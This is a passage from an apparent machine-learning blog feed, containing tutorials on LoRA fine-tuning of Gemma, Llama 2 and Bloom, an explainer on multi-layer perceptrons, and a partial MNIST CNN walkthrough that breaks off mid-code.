plt.show()</code></pre><h2 id="conclusion">Conclusion</h2><p>In this blog post, I built an AI-powered Intrusion Detection System using machine learning techniques. I walked through the steps of data preprocessing, model building, training, and evaluation. By following these steps, you can create a robust IDS to enhance the security of network systems.</p>]]></content:encoded></item><item><title><![CDATA[Fine-Tuning Gemma Google]]></title><description><![CDATA[<p>In this blog post, I will explore the process of finetuning a language model using Low-Rank Adaptation (LoRA). I will cover everything from setting up the environment to training and evaluating the model on a dataset of quotes.</p><h2 id="setting-up-the-environment">Setting Up the Environment</h2><p>First, I need to install the necessary libraries.</p>]]></description><link>https://blog.mohammedx.tech/fine-tuning-gemma-google/</link><guid isPermaLink="false">667342932074360001f33cdf</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 20:45:59 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/gemma-header.width-1200.format-webp.webp" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/gemma-header.width-1200.format-webp.webp" alt="Fine-Tuning Gemma Google"><p>In this blog post, I will explore the process of finetuning a language model using Low-Rank Adaptation (LoRA). I will cover everything from setting up the environment to training and evaluating the model on a dataset of quotes.</p><h2 id="setting-up-the-environment">Setting Up the Environment</h2><p>First, I need to install the necessary libraries.</p><pre><code class="language-python">!pip3 install -q -U bitsandbytes==0.42.0
!pip3 install -q -U peft==0.8.2
!pip3 install -q -U trl==0.7.10
!pip3 install -q -U accelerate==0.27.1
!pip3 install -q -U datasets==2.17.0
!pip3 install -q -U transformers==4.38.0</code></pre><h2 id="loading-the-model-and-tokenizer">Loading the Model and Tokenizer</h2><p>Next, I will load the model and tokenizer. I am using the <code>AutoTokenizer</code> and <code>AutoModelForCausalLM</code> from the Hugging Face <code>transformers</code> library.</p><pre><code class="language-python">import os
import transformers
import torch
from datasets import load_dataset
from google.colab import userdata
from trl import SFTTrainer
from peft import LoraConfig
from transformers import AutoTokenizer, AutoModelForCausalLM, Trainer
from transformers import BitsAndBytesConfig, GemmaTokenizer

# Note: bnb_config is defined in the next section; run that cell first (or
# move it above this one), since the model load below references it.
model_id = &quot;google/gemma-2b&quot;
tokenizer = AutoTokenizer.from_pretrained(model_id, token=os.environ[&apos;HF_TOKEN&apos;])
model = AutoModelForCausalLM.from_pretrained(model_id, quantization_config=bnb_config, device_map={&quot;&quot;:0}, token=os.environ[&apos;HF_TOKEN&apos;])</code></pre><h2 id="quantization-configuration">Quantization Configuration</h2><p>I will configure the model to use 4-bit quantization, which allows us to run larger models on smaller hardware.</p><pre><code class="language-python">bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type=&quot;nf4&quot;,
    bnb_4bit_compute_dtype=torch.bfloat16
)</code></pre><h2 id="generating-text-with-the-model">Generating Text with the Model</h2><p>Before we start training, let&apos;s generate some text to see how the model performs out of the box.</p><pre><code class="language-python">text = &quot;Quote: add quote,&quot;
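# (Rough estimate of mine, not from the post.) Before generating, why the
# 4-bit config above matters: Gemma-2B has roughly 2.5e9 parameters; fp16
# stores each in 2 bytes, nf4 in about half a byte (ignoring optimiser state
# and activation memory).
params = 2_500_000_000
fp16_gb = params * 2 / 1e9    # roughly 5 GB of weights in fp16
nf4_gb = params * 0.5 / 1e9   # roughly 1.25 GB in 4-bit nf4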
device = &quot;cuda:0&quot;
inputs = tokenizer(text, return_tensors=&quot;pt&quot;).to(device)

outputs = model.generate(**inputs, max_new_tokens=50)  # max_new_tokens alone; also passing max_length triggers a conflict warning
print(tokenizer.decode(outputs[0], skip_special_tokens=True))</code></pre><h2 id="configuring-lora">Configuring LoRA</h2><p>LoRA (Low-Rank Adaptation) helps to efficiently fine-tune models by adding trainable adaptation matrices.</p><pre><code class="language-python">os.environ[&quot;WANDB_DISABLED&quot;] = &quot;false&quot;
# Note: to actually disable Weights and Biases logging, WANDB_DISABLED must
# be the string &quot;true&quot;; &quot;false&quot; (as above) leaves it enabled.
lora_config = LoraConfig(
    r=8,
    target_modules=[&quot;q_proj&quot;, &quot;o_proj&quot;, &quot;k_proj&quot;, &quot;v_proj&quot;, &quot;gate_proj&quot;, &quot;up_proj&quot;, &quot;down_proj&quot;],
    task_type=&quot;CAUSAL_LM&quot;,
)</code></pre><h2 id="preparing-the-dataset">Preparing the Dataset</h2><p>I will use the <code>datasets</code> library to load and preprocess the dataset of quotes.</p><pre><code class="language-python">data = load_dataset(&quot;Abirate/english_quotes&quot;)
data = data.map(lambda samples: tokenizer(samples[&quot;quote&quot;]), batched=True)

def formatting_func(example):
    text = f&quot;Quote: {example[&apos;quote&apos;][0]}\nAuthor: {example[&apos;author&apos;][0]}&quot;
    return [text]</code></pre><h2 id="training-the-model">Training the Model</h2><p>I use the <code>SFTTrainer</code> from the <code>trl</code> library to train the model with the LoRA configuration.</p><pre><code class="language-python">trainer = SFTTrainer(
    model=model,
    train_dataset=data[&quot;train&quot;],
    args=transformers.TrainingArguments(
        per_device_train_batch_size=1,
        gradient_accumulation_steps=4,
        warmup_steps=200,
        max_steps=100,
        learning_rate=2e-4,
        fp16=True,
        logging_steps=1,
        output_dir=&quot;outputs&quot;,
        optim=&quot;paged_adamw_8bit&quot;
    ),
    peft_config=lora_config,
    formatting_func=formatting_func,
)

trainer.train()</code></pre><h2 id="evaluating-the-model">Evaluating the Model</h2><p>After training, I can generate text again to see how the model&apos;s performance has improved.</p><pre><code class="language-python">text = &quot;Quote: add quote,&quot;
device = &quot;cuda:0&quot;
inputs = tokenizer(text, return_tensors=&quot;pt&quot;).to(device)

outputs = model.generate(**inputs, max_new_tokens=50)  # max_new_tokens alone; also passing max_length triggers a conflict warning
print(tokenizer.decode(outputs[0], skip_special_tokens=True))</code></pre><h2 id="conclusion">Conclusion</h2><p>I walked through the process of finetuning a language model using LoRA. This method allows for efficient training by focusing on specific layers of the model. I demonstrated how to set up the environment, configure the model, prepare the dataset, and train the model. With this approach, you can adapt large language models to specific tasks with limited computational resources.</p>]]></content:encoded></item><item><title><![CDATA[Fine-Tuning Llama2]]></title><description><![CDATA[<p>In this tutorial, I will walk through the steps to fine-tune LLaMA2 using the Hugging Face Transformers library, along with LoRA (Low-Rank Adaptation) to make the process more efficient.</p><h3 id="setting-up-the-environment">Setting Up the Environment</h3><p>Start by setting up the environment and importing the necessary libraries.</p><pre><code class="language-python">import os
import torch
from datasets</code></pre>]]></description><link>https://blog.mohammedx.tech/fine-tuning-llama2/</link><guid isPermaLink="false">667341492074360001f33cbe</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 20:41:38 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/0x0--1--1.webp" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/0x0--1--1.webp" alt="Fine-Tuning Llama2"><p>In this tutorial, I will walk through the steps to fine-tune LLaMA2 using the Hugging Face Transformers library, along with LoRA (Low-Rank Adaptation) to make the process more efficient.</p><h3 id="setting-up-the-environment">Setting Up the Environment</h3><p>Start by setting up the environment and importing the necessary libraries.</p><pre><code class="language-python">import os
import torch
from datasets import load_dataset
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    HfArgumentParser,
    TrainingArguments,
    pipeline,
    logging,
)
from peft import LoraConfig, PeftModel
from trl import SFTTrainer</code></pre><h3 id="loading-the-dataset">Loading the Dataset</h3><p>Load the dataset that will be used for fine-tuning.</p><pre><code class="language-python">dataset_name = &quot;mlabonne/guanaco-llama2-1k&quot;
dataset = load_dataset(dataset_name, split=&quot;train&quot;)</code></pre><h3 id="configuring-the-model-for-fine-tuning">Configuring the Model for Fine-Tuning</h3><h4 id="bitsandbytes-configuration">BitsAndBytes Configuration</h4><p>Configure the BitsAndBytes settings to enable 4-bit quantization for efficient training.</p><pre><code class="language-python">model_name = &quot;NousResearch/Llama-2-7b-hf&quot;
use_4bit = True
bnb_4bit_compute_dtype = &quot;float16&quot;
bnb_4bit_quant_type = &quot;nf4&quot;
use_nested_quant = False

compute_dtype = getattr(torch, bnb_4bit_compute_dtype)
bnb_config = BitsAndBytesConfig(
    load_in_4bit=use_4bit,
    bnb_4bit_quant_type=bnb_4bit_quant_type,
    bnb_4bit_compute_dtype=compute_dtype,
    bnb_4bit_use_double_quant=use_nested_quant,
)</code></pre><h4 id="loading-the-base-model-and-tokenizer">Loading the Base Model and Tokenizer</h4><p>Load the base LLaMA model and tokenizer.</p><pre><code class="language-python">device_map = {&quot;&quot;: 0}

# Load base model
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    quantization_config=bnb_config,
    device_map=device_map
)
model.config.use_cache = False
model.config.pretraining_tp = 1

# Load LLaMA tokenizer
tokenizer = AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = &quot;right&quot;</code></pre><h3 id="applying-lora-configuration">Applying LoRA Configuration</h3><p>Configure LoRA for parameter-efficient fine-tuning.</p><pre><code class="language-python">lora_r = 64
lora_alpha = 16
lora_dropout = 0.1
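# (My note, not from the tutorial.) peft scales the low-rank update by
# lora_alpha / r, so alpha=16 with r=64 applies the adapter at a conservative
# strength of 0.25; raising alpha amplifies the learned update.
lora_scaling = 16 / 64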

peft_config = LoraConfig(
    lora_alpha=lora_alpha,
    lora_dropout=lora_dropout,
    r=lora_r,
    bias=&quot;none&quot;,
    task_type=&quot;CAUSAL_LM&quot;,
)</code></pre><h3 id="defining-training-arguments">Defining Training Arguments</h3><p>Set up the training arguments for the fine-tuning process.</p><pre><code class="language-python">output_dir = &quot;./results&quot;
num_train_epochs = 1
fp16 = False
bf16 = True
per_device_train_batch_size = 4
gradient_accumulation_steps = 1
save_steps = 0
logging_steps = 25
learning_rate = 2e-4
weight_decay = 0.001
optim = &quot;paged_adamw_32bit&quot;
lr_scheduler_type = &quot;cosine&quot;
max_steps = -1
warmup_ratio = 0.03
group_by_length = True
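# (My note.) The effective batch per optimiser step is
# per_device_train_batch_size * gradient_accumulation_steps; with the values
# above that is 4 * 1 = 4. Raising accumulation trades steps for memory,
# e.g. micro-batches of 4 accumulated over 8 steps behave like batch 32:
micro_batch = 4
accum_steps = 8
effective_batch = micro_batch * accum_steps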

training_arguments = TrainingArguments(
    output_dir=output_dir,
    num_train_epochs=num_train_epochs,
    per_device_train_batch_size=per_device_train_batch_size,
    gradient_accumulation_steps=gradient_accumulation_steps,
    optim=optim,
    save_steps=save_steps,
    logging_steps=logging_steps,
    learning_rate=learning_rate,
    weight_decay=weight_decay,
    fp16=fp16,
    bf16=bf16,
    max_grad_norm=0.3,
    max_steps=max_steps,
    warmup_ratio=warmup_ratio,
    group_by_length=group_by_length,
    lr_scheduler_type=lr_scheduler_type,
    report_to=&quot;tensorboard&quot;
)</code></pre><h3 id="fine-tuning-the-model">Fine-Tuning the Model</h3><p>Set up the trainer and start the fine-tuning process.</p><pre><code class="language-python">max_seq_length = None
packing = False

trainer = SFTTrainer(
    model=model,
    train_dataset=dataset,
    peft_config=peft_config,
    dataset_text_field=&quot;text&quot;,
    max_seq_length=max_seq_length,
    tokenizer=tokenizer,
    args=training_arguments,
    packing=packing,
)

trainer.train()</code></pre><h3 id="saving-the-fine-tuned-model">Saving the Fine-Tuned Model</h3><p>Save the fine-tuned model for future use.</p><pre><code class="language-python">new_model = &quot;Llama-2-7b-chat-finetune&quot;
trainer.model.save_pretrained(new_model)</code></pre><h3 id="testing-the-fine-tuned-model">Testing the Fine-Tuned Model</h3><p>Generate text using the fine-tuned model to verify its performance.</p><pre><code class="language-python">logging.set_verbosity(logging.CRITICAL)

prompt = &quot;How to fly a plane?&quot;
pipe = pipeline(task=&quot;text-generation&quot;, model=model, tokenizer=tokenizer, max_length=200)
result = pipe(f&quot;&lt;s&gt;[INST] {prompt} [/INST]&quot;)
print(result[0][&apos;generated_text&apos;])</code></pre><h3 id="conclusion">Conclusion</h3><p>I have successfully fine-tuned the LLaMA2 model using LoRA and the Hugging Face Transformers library. This process enables efficient model adaptation even with limited computational resources.</p>]]></content:encoded></item><item><title><![CDATA[Fine-Tuning Bloom AI Model]]></title><description><![CDATA[<p>In this blog post, I will explore how to fine-tune a large language model using LoRA (Low-Rank Adaptation). I will use the <code>bloom-3b</code> model from Hugging Face and perform fine-tuning on the SQuAD v2 dataset.</p><h2 id="setup-and-installation">Setup and Installation</h2><p>First, I need to install the necessary libraries. This includes <code>bitsandbytes</code>, <code>datasets</code></p>]]></description><link>https://blog.mohammedx.tech/fine-tuning-bloom-ai-model/</link><guid isPermaLink="false">6673404c2074360001f33c9c</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 20:36:07 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/104_large-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/104_large-1.jpg" alt="Fine-Tuning Bloom AI Model"><p>In this blog post, I will explore how to fine-tune a large language model using LoRA (Low-Rank Adaptation). I will use the <code>bloom-3b</code> model from Hugging Face and perform fine-tuning on the SQuAD v2 dataset.</p><h2 id="setup-and-installation">Setup and Installation</h2><p>First, I need to install the necessary libraries. This includes <code>bitsandbytes</code>, <code>datasets</code>, <code>accelerate</code>, <code>loralib</code>, and <code>peft</code>.</p><pre><code class="language-python">!pip install -q bitsandbytes datasets accelerate loralib
!pip install -q git+https://github.com/huggingface/peft.git
!pip install -q git+https://github.com/huggingface/transformers.git
import os
os.environ[&quot;CUDA_VISIBLE_DEVICES&quot;] = &quot;0&quot;</code></pre><h2 id="model-preparation">Model Preparation</h2><p>Load the <code>bloom-3b</code> model and tokenizer, and prepare the model for fine-tuning.</p><pre><code class="language-python">import torch
import torch.nn as nn
import bitsandbytes as bnb
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained(
    &quot;bigscience/bloom-3b&quot;,
    torch_dtype=torch.float16,
    device_map=&apos;auto&apos;
)

tokenizer = AutoTokenizer.from_pretrained(&quot;bigscience/bloom-3b&quot;)
for param in model.parameters():
    param.requires_grad = False
    if param.ndim == 1:
        param.data = param.data.to(torch.float32)

model.gradient_checkpointing_enable()
model.enable_input_require_grads()

class CastOutputFloat(nn.Sequential):
    def forward(self, x): 
        return super().forward(x).to(torch.float32)

model.lm_head = CastOutputFloat(model.lm_head)</code></pre><h2 id="lora-configuration">LoRA Configuration</h2><p>Configure the model to use LoRA for fine-tuning. This involves setting up a LoRA configuration and applying it to the model.</p><pre><code class="language-python">from peft import LoraConfig, get_peft_model

config = LoraConfig(
    r=8,
    lora_alpha=16,
    target_modules=[&quot;query_key_value&quot;],
    lora_dropout=0.05,
    bias=&quot;none&quot;,
    task_type=&quot;CAUSAL_LM&quot;,
)

model = get_peft_model(model, config)
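# (My aside.) What to expect from the count below: LoRA with r=8 on a
# hypothetical 2048x2048 projection trains 8*2048 + 8*2048 values instead of
# 2048*2048, i.e. about 128x fewer trainable parameters for that layer.
full_params = 2048 * 2048
lora_params = 8 * 2048 + 8 * 2048
reduction = full_params / lora_params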

def print_trainable_parameters(model):
    trainable_params = 0
    all_param = 0
    for _, param in model.named_parameters():
        all_param += param.numel()
        if param.requires_grad:
            trainable_params += param.numel()
    print(f&quot;trainable parameters: {trainable_params} || all parameters: {all_param} || percentage: {trainable_params/all_param*100:.2f}%&quot;)

print_trainable_parameters(model)</code></pre><h2 id="dataset-preparation">Dataset Preparation</h2><p>Load the SQuAD v2 dataset and preprocess it for training.</p><pre><code class="language-python">from datasets import load_dataset

qa_dataset = load_dataset(&quot;squad_v2&quot;)

def create_prompt(context, question, answer):
    if len(answer[&quot;text&quot;]) &lt; 1:
        answer_text = &quot;Cannot answer&quot;
    else:
        answer_text = answer[&quot;text&quot;][0]
    prompt_template = f&quot;### CONTEXT\n{context}\n\n### QUESTION\n{question}\n\n### ANSWER\n{answer_text}&lt;/s&gt;&quot;
    return prompt_template
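# (My addition.) The fallback above in miniature: SQuAD v2 marks an
# unanswerable question with an empty answers["text"] list, and the template
# substitutes a fixed placeholder string in that case.
def first_answer_or(answers, default):
    if len(answers["text"]) == 0:
        return default
    return answers["text"][0]

no_answer = first_answer_or({"text": []}, "Cannot answer")
with_answer = first_answer_or({"text": ["France"]}, "Cannot answer")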

mapped_qa_dataset = qa_dataset.map(
    lambda samples: tokenizer(
        create_prompt(samples[&apos;context&apos;], samples[&apos;question&apos;], samples[&apos;answers&apos;])))</code></pre><h2 id="training-the-model">Training the Model</h2><p>Set up the training arguments and train the model using the <code>Trainer</code> class from Hugging Face Transformers.</p><pre><code class="language-python">import transformers

trainer = transformers.Trainer(
    model=model,
    train_dataset=mapped_qa_dataset[&quot;train&quot;],
    args=transformers.TrainingArguments(
        per_device_train_batch_size=4,
        gradient_accumulation_steps=4,
        warmup_steps=100,
        max_steps=100,
        learning_rate=1e-3,
        fp16=True,
        logging_steps=1,
        output_dir=&apos;outputs&apos;,
    ),
    data_collator=transformers.DataCollatorForLanguageModeling(tokenizer, mlm=False)
)

model.config.use_cache = False
trainer.train()</code></pre><h2 id="model-deployment">Model Deployment</h2><p>Login to Hugging Face and push the fine-tuned model to the Hugging Face Hub.</p><pre><code class="language-python">HUGGING_FACE_USER_NAME = &quot;Mohammedxo51&quot;

from huggingface_hub import notebook_login
notebook_login()

model_name = &quot;squad-bloom-3b&quot;

model.push_to_hub(f&quot;{HUGGING_FACE_USER_NAME}/{model_name}&quot;, use_auth_token=True)</code></pre><h2 id="inference">Inference</h2><p>Load the fine-tuned model and tokenizer, and perform inference to answer questions based on provided context.</p><pre><code class="language-python">from peft import PeftModel, PeftConfig
from transformers import AutoModelForCausalLM, AutoTokenizer

peft_model_id = f&quot;{HUGGING_FACE_USER_NAME}/{model_name}&quot;
config = PeftConfig.from_pretrained(peft_model_id)
model = AutoModelForCausalLM.from_pretrained(config.base_model_name_or_path, return_dict=True, load_in_8bit=False, device_map=&apos;auto&apos;)
tokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path)

qa_model = PeftModel.from_pretrained(model, peft_model_id)

from IPython.display import display, Markdown

def make_inference(context, question):
    prompt = f&quot;### CONTEXT\n{context}\n\n### QUESTION\n{question}\n\n### ANSWER\n&quot;
    inputs = tokenizer(prompt, return_tensors=&quot;pt&quot;)
    inputs = {k: v.to(qa_model.device) for k, v in inputs.items()}

    with torch.cuda.amp.autocast():
        output_tokens = qa_model.generate(**inputs, max_new_tokens=200, pad_token_id=tokenizer.eos_token_id)

    answer = tokenizer.decode(output_tokens[0], skip_special_tokens=True)
    display(Markdown(answer))

context = &quot;Some context&quot;
question = &quot;A question about the context?&quot;
make_inference(context, question)</code></pre><h2 id="conclusion">Conclusion</h2><p>In this blog post, I covered the steps to fine-tune a large language model using LoRA. I demonstrated how to set up the environment, prepare the model, configure LoRA, preprocess the dataset, train the model, deploy it to the Hugging Face Hub, and perform inference. This approach allows for efficient fine-tuning with a significantly reduced number of trainable parameters.</p>]]></content:encoded></item><item><title><![CDATA[Multi-Layer Perceptron (MLP)]]></title><description><![CDATA[<p>This blog post dives deep into Multi-Layer Perceptrons (MLP), the building blocks of deep learning. Explore how they model complex data to drive AI innovations in fields like voice recognition and financial forecasting. </p><h2 id="what-is-a-neuron">What is a Neuron?</h2><p>In the context of neural networks, a neuron is a basic unit, similar</p>]]></description><link>https://blog.mohammedx.tech/mlp/</link><guid isPermaLink="false">6672669d2074360001f33c20</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 05:33:58 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/mlp.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/mlp.jpg" alt="Multi-Layer Perceptron (MLP)"><p>This blog post dives deep into Multi-Layer Perceptrons (MLP), the building blocks of deep learning. Explore how they model complex data to drive AI innovations in fields like voice recognition and financial forecasting. </p><h2 id="what-is-a-neuron">What is a Neuron?</h2><p>In the context of neural networks, a neuron is a basic unit, similar to a tiny processing element in a computer. Imagine it as a small worker in your brain that receives input, processes it, and passes on the output. 
In a Multi-Layer Perceptron, each neuron receives signals from previous layers, processes these signals by performing simple calculations, and then sends the result to the next layer of neurons. This process is much like passing a message along in a game of telephone, where each player adds a little bit to the message before passing it on. Neurons work together in layers to handle complex tasks like recognizing faces or understanding spoken words.</p><h2 id="structure-of-an-mlp">Structure of an MLP</h2><p>A Multi-Layer Perceptron (MLP) is like a complex network made up of layers stacked one after another. Each layer is filled with neurons, those tiny workers that process and pass on information. The first layer, called the input layer, receives the initial data, like images or sounds. The last layer, known as the output layer, gives the final result, like identifying an object in a picture. Between the input and output, there are one or more hidden layers where most of the processing happens. These layers work together to transform the input data step-by-step into a form that the output layer can use to make a decision or prediction. This layered structure allows MLPs to learn from data and make smart decisions based on what they&apos;ve learned.</p><h2 id="the-forward-pass-data-flow-through-layers">The Forward Pass: Data Flow through Layers.</h2><p>In a Multi-Layer Perceptron (MLP), the forward pass is like data going through a series of gates. It starts at the input layer, where each neuron looks at a piece of the data and does a simple math problem. Think of this as the first gate, where the data gets a quick check. Then, the data moves to the next layer, or the next gate, where it gets checked again but in a slightly different way. Each layer works like a gate, making the data a bit clearer and more useful every time it passes through one. 
By the time the data reaches the output layer, the last gate, it&apos;s fully processed and ready to give us an answer or decision. The whole journey is straightforward, with data moving from one gate to the next without going back.</p><h2 id="activation-functions">Activation Functions.</h2><p>Activation functions in a Multi-Layer Perceptron (MLP) are like special rules that decide how a neuron should react to the information it receives. Without activation functions, an MLP would just perform simple, straightforward calculations, which might not be enough to solve more complex problems like recognizing images or understanding speech.</p><p>Think of activation functions as filters at a playground slide. These filters decide how much of the incoming signals (kids wanting to slide) should actually go through. Some signals might trigger a strong reaction and send lots of data forward (like a big push that sends a kid sliding fast), while others might not do much at all (like a gentle push that only moves the kid a little).</p><p>By using these rules or filters, MLPs can handle information in more complex and nuanced ways, which is essential for dealing with the tricky, non-straightforward tasks we often ask them to perform. This ability to process information in non-linear, varied ways is what makes MLPs so powerful in the world of artificial intelligence.</p><h2 id="backpropagation-algorithm-learning-from-errors">Backpropagation Algorithm: Learning from Errors.</h2><p>The backpropagation algorithm is like a teacher who helps a Multi-Layer Perceptron (MLP) learn from its mistakes. When an MLP tries to make a prediction, such as guessing what&apos;s in a picture, it might not always get it right. The backpropagation algorithm checks the MLP&apos;s answer against the correct answer and then figures out where the MLP went wrong.</p><p>Think of it like going back over a path of footprints to see where you slipped. 
The algorithm starts from the end (the wrong answer) and moves backwards through the network, adjusting things slightly at each layer to correct the mistake. It tells each neuron in the MLP how to change its calculations to be more accurate next time. This process of moving backward and making adjustments helps the MLP improve, so it can make better guesses in the future. It&apos;s like learning through trial and error, constantly tweaking and improving based on feedback.</p><h2 id="conclusion">Conclusion</h2><p>In conclusion, Multi-Layer Perceptrons (MLPs) are a fundamental tool in the world of deep learning, helping machines tackle complex tasks by mimicking the way our brains work. From understanding how MLPs function to seeing them in action with practical examples, we&apos;ve explored the significant role they play in advancing artificial intelligence. Whether you&apos;re just starting out or looking to deepen your knowledge, the journey into neural networks is as exciting as it is rewarding. Happy exploring, and keep learning!</p>]]></content:encoded></item><item><title><![CDATA[Convolutional Neural Network (CNN)]]></title><description><![CDATA[<p>In this blog, I will discuss Convolutional Neural Networks (CNNs) and demonstrate how to build a neural network for digit image classification.</p><h2 id="brief-overview-of-cnn-and-its-applications">Brief overview of CNN and its applications</h2><p>Convolutional Neural Networks (CNNs) are deep learning models designed for image processing. 
They are used in image classification, object detection, image</p>]]></description><link>https://blog.mohammedx.tech/convolutional-neural-network/</link><guid isPermaLink="false">66726b332074360001f33c44</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 05:33:51 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/output-layer.png" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/output-layer.png" alt="Convolutional Neural Network (CNN)"><p>In this blog, I will discuss Convolutional Neural Networks (CNNs) and demonstrate how to build a neural network for digit image classification.</p><h2 id="brief-overview-of-cnn-and-its-applications">Brief overview of CNN and its applications</h2><p>Convolutional Neural Networks (CNNs) are deep learning models designed for image processing. They are used in image classification, object detection, image segmentation, facial recognition, autonomous vehicles, and enhancing text data processing in natural language processing.</p><h2 id="loading-and-preprocessing-the-mnist-dataset">Loading and Preprocessing the MNIST Dataset</h2><p>To start building our CNN model, the first step is to load and preprocess the MNIST dataset. The MNIST dataset consists of 60,000 training images and 10,000 testing images of handwritten digits, each of size 28x28 pixels.</p><p><strong>Loading the Dataset:</strong></p><p>We use the <code>mnist</code> module from <code>tensorflow.keras.datasets</code> to load the dataset. The <code>load_data()</code> function returns four NumPy arrays: the training images (<code>trainX</code>), training labels (<code>trainY</code>), testing images (<code>testX</code>), and testing labels (<code>testY</code>).</p><pre><code class="language-python">from tensorflow.keras.datasets import mnist
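</code></pre><p>For readers without TensorFlow installed, the shapes that <code>load_data()</code> returns can be sketched with NumPy placeholders (sizes taken from the dataset description above):</p>

```python
import numpy as np

# stand-ins with the same shapes and dtype that mnist.load_data() returns
trainX = np.zeros((60000, 28, 28), dtype=np.uint8)   # 60,000 training images
trainY = np.zeros((60000,), dtype=np.uint8)          # one digit label each
testX = np.zeros((10000, 28, 28), dtype=np.uint8)    # 10,000 test images
testY = np.zeros((10000,), dtype=np.uint8)

print(trainX.shape)   # (60000, 28, 28)
```

<p>The real call below downloads the dataset on first use and returns these four arrays as two (images, labels) tuples:</p><pre><code class="language-python">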

# load train and test dataset
(trainX, trainY), (testX, testY) = mnist.load_data()</code></pre><p><strong>Reshaping and Encoding the Data:</strong></p><p>Keras convolutional layers expect an explicit channel dimension, and MNIST images are grayscale (a single channel), so we reshape each image from <code>(28, 28)</code> to <code>(28, 28, 1)</code> with <code>reshape()</code>.</p><p>Additionally, the labels need to be one-hot encoded, converting the integer labels into binary class matrices using the <code>to_categorical()</code> function from <code>tensorflow.keras.utils</code>.</p><pre><code class="language-python">from tensorflow.keras.utils import to_categorical
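</code></pre><p>What one-hot encoding does can be seen with plain NumPy (an equivalent sketch, not the Keras implementation itself):</p>

```python
import numpy as np

labels = np.array([3, 0, 7])     # three example digit labels
one_hot = np.eye(10)[labels]     # 10 classes, one column per digit 0-9

print(one_hot[0])
# [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.] - a 1 in position 3, 0s elsewhere
```

<p>In the pipeline itself, the reshape and the one-hot encoding look like this:</p><pre><code class="language-python">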

# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))

# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)</code></pre><h2 id="preparing-pixel-data">Preparing Pixel Data</h2><p>Before feeding the MNIST dataset into our Convolutional Neural Network (CNN), it&apos;s crucial to preprocess the pixel values to ensure the model performs optimally. This step involves normalizing the pixel values to a range that the neural network can handle more efficiently.</p><p><strong>Converting Pixel Values to Floats:</strong></p><p>The pixel values in the MNIST dataset are originally integers ranging from 0 to 255. To normalize these values, we first need to convert them to floats. This conversion ensures that subsequent operations, like division for normalization, are performed correctly.</p><pre><code class="language-python"># convert from integers to floats
train_norm = train.astype(&apos;float32&apos;)
test_norm = test.astype(&apos;float32&apos;)</code></pre><p><strong>Normalizing to Range 0-1:</strong></p><p>Neural networks perform better when input values are normalized. In this case, we scale the pixel values from the original range of 0-255 to a range of 0-1. This is done by dividing each pixel value by 255.0.</p><pre><code class="language-python"># normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
</code></pre><p><strong>Complete Function:</strong></p><pre><code class="language-python"># scale pixels
def prep_pixels(train, test):
    # convert from integers to floats
    train_norm = train.astype(&apos;float32&apos;)
    test_norm = test.astype(&apos;float32&apos;)
    # normalize to range 0-1
    train_norm = train_norm / 255.0
    test_norm = test_norm / 255.0
    # return normalized images
    return train_norm, test_norm
</code></pre><h2 id="defining-the-cnn-model">Defining the CNN Model</h2><p><strong>1. Convolutional Layer:</strong></p><ul><li>The first layer is a 2D convolutional layer with 32 filters, a 3x3 kernel, and a ReLU activation function. This layer uses the &apos;he_uniform&apos; initializer for the kernel weights and expects input images of shape (28, 28, 1).</li></ul><pre><code class="language-python">model.add(Conv2D(32, (3, 3), activation=&apos;relu&apos;, kernel_initializer=&apos;he_uniform&apos;, input_shape=(28, 28, 1)))</code></pre><p><strong>2. Max Pooling Layer:</strong></p><ul><li>Following the convolutional layer, we add a max pooling layer with a pool size of 2x2. This layer reduces the spatial dimensions of the feature maps, which helps to decrease computational load and control overfitting.</li></ul><pre><code class="language-python">model.add(MaxPooling2D((2, 2)))</code></pre><p><strong>3. Flatten Layer:</strong></p><ul><li>Next, we flatten the 2D feature maps into a 1D vector. This step prepares the data for the fully connected layers.</li></ul><pre><code class="language-python">model.add(Flatten())</code></pre><p><strong>4. Fully Connected (Dense) Layer:</strong></p><ul><li>We add a dense layer with 100 units and ReLU activation. This layer further processes the features extracted by the convolutional layers.</li></ul><pre><code class="language-python">model.add(Dense(100, activation=&apos;relu&apos;, kernel_initializer=&apos;he_uniform&apos;))
